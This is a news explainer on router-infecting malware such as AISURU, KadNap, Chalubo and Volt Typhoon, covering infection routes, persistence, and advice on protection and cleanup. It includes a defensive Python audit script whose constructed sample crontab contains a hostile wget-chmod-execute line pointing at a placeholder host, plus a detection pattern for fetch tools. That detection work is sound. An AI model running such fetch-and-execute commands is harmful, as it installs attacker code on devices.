MALWARE IS WHERE YOU LEAST EXPECT IT


A new wave of malicious programs is massively infecting home routers around the world, turning millions of devices into silent weapons in service of organized crime and state espionage operations.

The FBI, CISA, and cybersecurity agencies from a dozen countries have issued urgent alerts: the threat is real, it is active right now, and it may be occurring on your own network.

The weakest link could be in your home

By: Gabriel E Levy B

Every time someone turns on a laptop, sends a text message, or makes a video call, the traffic from that communication passes through a small device that few people check, update, or even remember exists: the home router.

For years, that device, relegated to a corner of the living room, was ignored by users and manufacturers alike when it came to security.

Today, that collective negligence has generated one of the most serious cybersecurity crises in recent history.

Dozens of malware families have turned home and small-office routers into their preferred target.

The ecosystem of documented threats through early 2026 includes at least twelve active variants that infect, spy on, lease out and, in the most extreme cases, permanently destroy these devices.

The impact is global: in 2025, 47.1 million distributed denial-of-service attacks were recorded, an increase of 121% compared to the previous year, the majority carried out by compromised routers.

In December of that year, a single botnet reached 31.4 terabits per second of malicious traffic, breaking all historical records.

The key players in the threat

The most aggressive malware currently in circulation is called AISURU, also known as Airashi or Kimwolf. First identified in August 2024, this program — a direct descendant of the historical Mirai — controls more than 300,000 infected devices from brands such as Totolink, Zyxel, D-Link, Linksys, and T-Mobile.

In April 2025, its operators managed to infiltrate Totolink’s firmware update server, which allowed them to distribute malicious scripts to tens of thousands of routers simultaneously — that is, they turned the manufacturer’s own security mechanism into a mass infection vector.

Another high-impact actor is TheMoon, a malware known since 2014 that resurged forcefully in 2024 to feed a lucrative criminal proxy service called Faceless. This service billed more than 46 million dollars selling anonymous internet access through infected routers, before the FBI intervened in May 2025 with Operation Moonlander.

However, the threat did not disappear: a successor version called KadNap emerged, with around 14,000 compromised devices and a peer-to-peer network architecture practically impossible to dismantle using traditional methods.

The most disturbing scenario to date occurred in October 2023, when the Chalubo malware executed the so-called “Pumpkin Eclipse” operation: in just 72 hours, it permanently destroyed more than 600,000 routers belonging to a single US internet service provider. The devices were rendered completely inoperable and had to be physically replaced, disproportionately affecting rural communities with limited access to alternative services. The identity of the attacker remains unknown.

On the geopolitical front, the Chinese group Volt Typhoon maintained covert access to critical US infrastructure for at least five years using compromised home routers as invisible relay nodes.

How do they operate and why are they so hard to detect?

Routers are an ideal target precisely because they lack protection software.

They have no antivirus, they rarely have activity logs accessible to the average user, and in most home cases, no one monitors them.

Add to that years of accumulated unpatched vulnerabilities, default passwords that are never changed, and unnecessarily active remote management services.

The infection method varies depending on the malware, but follows three main routes: exploiting known vulnerabilities that the manufacturer will no longer patch because the device has reached end of life; taking advantage of weak or default credentials through brute force attacks; or, in the most sophisticated cases, compromising the firmware supply chain, as AISURU did with Totolink.

Once inside, the malware acts with extreme discretion: Volt Typhoon uses tools from the router’s own operating system to leave no traces; Chalubo runs entirely in memory and deletes its own files after execution; KadNap buries its command infrastructure within peer-to-peer network traffic, indistinguishable from normal BitTorrent usage.

Persistence has also become more sophisticated.

While older variants disappear with a simple device restart, the most recent threats survive even a factory reset. KadNap installs a scheduled task that downloads and executes the malware again at minute 55 of every hour. AyySSHush, which attacks ASUS routers, injects SSH keys using the manufacturer’s own configuration tools, creating a permanent backdoor that does not disappear even with the deepest reset.

How to protect yourself: concrete steps for users and businesses

The most urgent recommendation from cybersecurity agencies is also the most direct: replace any router that no longer receives security updates from its manufacturer. Using a device without active support is equivalent to leaving the front door unlocked. In 2025 the FBI identified thirteen Linksys models that are still being actively exploited and no longer receive updates; the list is constantly growing.

For devices that still have support, the most effective measures include: disabling remote management, the single configuration change with the greatest impact according to all official reports; disabling UPnP and WPS, protocols that new Mirai variants are actively exploiting; updating firmware regularly from the manufacturer’s official website; and changing administrator credentials to a strong, unique password.

CISA also recommends separating smart home devices (cameras, televisions, thermostats) on an independent guest network, so that if one is compromised it does not affect the rest.

What to do if the router is already infected

Detecting an infection is not always straightforward. The most common signs include unusual device heating, intermittent connection drops, abnormally slow speeds, DNS configuration changes the user did not make, or administrator credentials that suddenly stop working.
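The persistence mechanisms described earlier (KadNap's hourly re-download at minute 55, AyySSHush's injected SSH keys) and the DNS-change indicator above can be checked mechanically where the owner can read the router's crontab, authorized_keys and resolver configuration (for example on an OpenWrt-style device). The following Python audit is an added example, not code from the article or from any of the cited reports; the allowlists and the sample dumps are constructed, and example.invalid is a placeholder host.

```python
import re

# Hypothetical allowlists: the key and resolvers the owner actually configured.
KNOWN_KEYS = {"AAAAC3NzaC1lZDI1NTE5AAAAIOwnerKeyConstructedExample"}
EXPECTED_DNS = {"192.168.1.1", "1.1.1.1"}
# A download-and-execute job: a fetch tool followed by chmod or a shell.
FETCH_EXEC = re.compile(r"\b(wget|curl|tftp|ftpget)\b.*\b(sh|bash|chmod)\b")

def suspicious_cron(crontab: str) -> list:
    """Flag hourly jobs (fixed minute, '*' hour) whose command fetches and runs code."""
    hits = []
    for line in crontab.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)  # m h dom mon dow command
        if len(fields) < 6:
            continue
        minute, hour, cmd = fields[0], fields[1], fields[5]
        if minute.isdigit() and hour == "*" and FETCH_EXEC.search(cmd):
            hits.append(f"hourly fetch-and-execute at minute {minute}: {cmd}")
    return hits

def unknown_ssh_keys(authorized_keys: str) -> list:
    """Return key bodies absent from the owner's allowlist (possible injected backdoor)."""
    unknown = []
    for line in authorized_keys.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[0].startswith(("ssh-", "ecdsa-")):
            if parts[1] not in KNOWN_KEYS:
                unknown.append(parts[1])
    return unknown

def unexpected_dns(resolv_conf: str) -> list:
    """Return nameserver entries the owner did not configure."""
    servers = re.findall(r"^nameserver\s+(\S+)", resolv_conf, re.M)
    return [s for s in servers if s not in EXPECTED_DNS]

# Constructed samples modelled on the behaviour the article describes;
# example.invalid is a reserved placeholder host, not a real download site.
SAMPLE_CRON = """# m h dom mon dow command
0 3 * * * /sbin/logrotate
55 * * * * wget -q -O /tmp/.x http://example.invalid/x && chmod +x /tmp/.x && /tmp/.x
"""
SAMPLE_KEYS = """ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOwnerKeyConstructedExample owner@laptop
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC-constructed-unknown-key unknown@nowhere
"""
SAMPLE_RESOLV = "nameserver 192.168.1.1\nnameserver 203.0.113.5\n"
```

A hit from any of the three checks is a reason to proceed to the reset-and-reflash procedure below rather than just rebooting, since a cron re-download or an injected key survives a power cycle.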

If an infection is suspected, the recommended protocol begins with a power cycle of the router: unplugging it from power for 30 seconds eliminates memory-resident malware in the majority of traditional variants.

However, that does not close the vulnerability.

The next step is a complete factory reset, usually by holding down the reset button for ten seconds, followed immediately by installing the latest available firmware, before reconnecting the device to the internet.

Reconfiguration must be done from scratch: new administrator credentials, a Wi-Fi network with a strong password, non-essential services disabled.

For ASUS routers affected by AyySSHush or WrtHug, where a factory reset may not be sufficient, ASUS has published a specific procedure that includes a firmware update and disabling AiCloud. If the router is literally unusable, as happened with Chalubo’s victims, the only solution is physical replacement.

The underlying problem is structural.

Hundreds of millions of routers around the world have reached the end of their useful life, their owners do not know it, and manufacturers have no legal obligation to warn them.

Meanwhile, the criminal ecosystem that exploits them generates tens of millions of dollars annually, and state actors use them to strategically position themselves within critical infrastructure in anticipation of potential future conflicts.

Security agencies can dismantle botnets, as the FBI did with KV-Botnet in 2024, but reinfection is a matter of months. The only lasting defense, experts warn, begins with the user who looks at that small device in a corner and decides, for the first time, to take it seriously.

In Conclusion

A dozen malware families — AISURU, TheMoon, Chalubo, Ballista, Volt Typhoon — infect millions of home routers around the world, turning them into weapons for massive attacks, criminal proxies, and state espionage.

Difficult to detect and increasingly resistant to rebooting, these programs exploit devices with missing updates and weak passwords.

The solution starts with replacing outdated routers, disabling remote management, and updating firmware regularly.

SOURCES AND REFERENCES

  • FBI / IC3 — PSA250507: Cyber Criminal Proxy Services Exploiting End of Life Routers (May 2025). fbi.gov
  • CISA — PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure, Advisory AA24-038A (2024). cisa.gov
  • CISA — Secure by Design Alert: Security Design Improvements for SOHO Device Manufacturers (2024). cisa.gov
  • Microsoft Security Blog — Volt Typhoon targets US critical infrastructure with living-off-the-land techniques (May 2023). microsoft.com
  • Lumen / Black Lotus Labs — The Pumpkin Eclipse: Identifying Chalubo Malware (2024). blog.lumen.com
  • Lumen / Black Lotus Labs — The Dark Side of TheMoon (2024). blog.lumen.com
  • Qianxin XLab — The Most Powerful Ever? Inside the 11.5Tbps-Scale Mega Botnet AISURU (2025). blog.xlab.qianxin.com
  • The Hacker News — AISURU/Kimwolf Botnet Launches Record-Setting 31.4 Tbps DDoS Attack (February 2026). thehackernews.com
  • The Hacker News — KadNap Malware Infects 14,000+ Edge Devices to Power Stealth Proxy Botnet (March 2026). thehackernews.com
  • The Hacker News — Ballista Botnet Exploits Unpatched TP-Link Vulnerability (March 2025). thehackernews.com
  • The Hacker News — WrtHug Exploits Six ASUS WRT Flaws to Hijack EoL Routers Worldwide (November 2025). thehackernews.com
  • Bleeping Computer — Malware botnet bricked 600,000 routers in mysterious 2023 attack (2024). bleepingcomputer.com
  • Bleeping Computer — TheMoon malware infects 6,000 ASUS routers in 72 hours for proxy service (2024). bleepingcomputer.com
  • Krebs on Security — DDoS Botnet Aisuru Blankets US ISPs in Record DDoS (October 2025). krebsonsecurity.com
  • SecurityScorecard — Operation WrtHug: The Global Espionage Campaign Hiding in Your Home Router (2025). securityscorecard.com
  • Cato Networks CTRL — Ballista: New IoT Botnet Targeting Thousands of TP-Link Archer Routers (2025). catonetworks.com
  • ASUS — Official Statement on Recent Reports Regarding Router Security (June 2025). asus.com